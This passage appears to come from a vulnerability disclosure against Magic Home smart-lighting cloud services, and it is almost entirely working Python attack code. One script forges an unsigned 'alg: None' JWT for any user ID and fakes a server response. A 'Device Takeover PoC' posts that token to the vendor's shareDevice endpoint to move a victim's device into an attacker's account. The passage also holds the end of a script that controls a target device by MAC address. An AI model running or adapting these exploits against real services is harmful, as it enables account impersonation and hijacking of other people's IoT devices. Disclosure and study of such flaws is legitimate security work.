a target device mac address: " + Style.RESET_ALL) lighItUp(target, token) elif (attackboolean.upper() == 'N'): print (Fore.CYAN + "Sometimes, belief isn’t about what we can see. It’s about what we can’t."+ Style.RESET_ALL) else: print (Fore.CYAN + "The human eye is a wonderful device. With a little effort, it can fail to see even the most glaring injustice." + Style.RESET_ALL) if __name__ == "__main__": Main() ## Token Forging ## #!/usr/local/bin/python3 import url64 import requests import json import sys import os from colorama import init from colorama import Fore, Back, Style import re import time from wsgiref.handlers import format_date_time from datetime import datetime from time import mktime now = datetime.now() stamp = mktime(now.timetuple()) ''' HTTP/1.1 200 Server: nginx/1.10.3 Content-Type: application/json;charset=UTF-8 Connection: close "{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http:\/\/wifij01us.magichue.net\/app\/ota\/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\"\",\"userEmail\":\"\",\"userUniID\":\"\"},\"token\":\"\"}" ''' def Usage(): print (f"Usage: {sys.argv[0]} <username> <unique id>") def Main(user, uniqid): os.system('clear') print ("[+] Encoding ...") print ("[+] Bypass header created!") print ("HTTP/1.1 200") print ("Server: nginx/1.10.3") print ("Date: "+str(format_date_time(stamp))+"") print ("Content-Type: application/json;charset=UTF-8") print ("Connection: close\r\n\r\n") jwt_header = '{"typ": "JsonWebToken","alg": "None"}' jwt_data = '{"userID": "'+user+'", "uniID": "'+uniqid+'","cdpid": "ZG001","clientID": "","serverCode": "US","expireDate": 1618264850608,"refreshDate": 1613080850608,"loginDate": 1602712850608}' jwt_headerEncoded = url64.encode(jwt_header.strip()) jwt_dataEncoded = url64.encode(jwt_data.strip()) jwtcombined = (jwt_headerEncoded.strip()+"."+jwt_dataEncoded.strip()+".") print ("{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http://wifij01us.magichue.net/app/ota/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\""+user+"\",\"userEmail\":\""+user+"\",\"userUniID\":\""+uniqid+"\"},\"token\":\""+jwtcombined+"\"}") if __name__ == "__main__": if len(sys.argv) < 3: Usage() else: Main(sys.argv[1], sys.argv[2]) ## Device Takeover PoC ## #!/usr/local/bin/python3 import url64 import requests import json import sys import os from colorama import init from colorama import Fore, Back, Style import re def Usage(): print (f"Usage: {sys.argv[0]} <attacker email> <target email> <target mac address> <target forged token>") def Main(): attacker_email = sys.argv[1] target_email = sys.argv[2] target_mac = sys.argv[3] forged_token = sys.argv[4] os.system('clear') print (Fore.WHITE + "[+] Sending Payload ...") url = "https://wifij01us.magichue.net/app/shareDevice/ZG001" array = {"friendUserID":attacker_email, "macAddress":target_mac} data = json.dumps(array) headers = { "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)", "Accept-Language": "en-US", "Accept": "application/json", "Content-Type": "application/json; charset=utf-8", "token":forged_token, "Host": "wifij01us.magichue.net", "Connection": "close", "Accept-Encoding": "gzip, deflate" } response = requests.post(url, data=data, headers=headers) if response.status_code == 200: if "true" in response.text: print (Fore.GREEN + "[*] Target is now yours ... " + Style.RESET_ALL) else: print (Fore.RED + "[-] Failed to take over target !" + Style.RESET_ALL) if __name__ == "__main__": if len(sys.argv) < 5: Usage() else: Main()